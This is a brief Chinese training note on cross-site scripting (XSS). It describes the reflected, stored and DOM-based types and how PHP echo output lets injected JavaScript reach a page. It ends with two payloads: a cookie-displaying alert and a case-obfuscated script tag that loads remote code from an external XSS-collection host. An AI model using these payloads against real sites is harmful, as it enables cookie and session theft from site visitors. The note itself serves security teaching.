笔记本: 我的第一个笔记本
创建时间: 2020/7/8 9:09 更新时间: 2020/7/8 18:39
作者: 820410740@qq.com
20200708信息安全实训
XSS漏洞
跨站脚本攻击
攻击者向web页面插入恶意的javascript脚本代码
html+php
通常通过php的输出函数echo将javascript代码输出到html页面中
分为 反射型xss 攻击者事先做好链接
存储型xss 储存到服务器中
DOM型xss
<script>alert(document.cookie)</script>
<sCRiPt sRC=//xsshs.cn/HVrR></sCrIpT>
评论0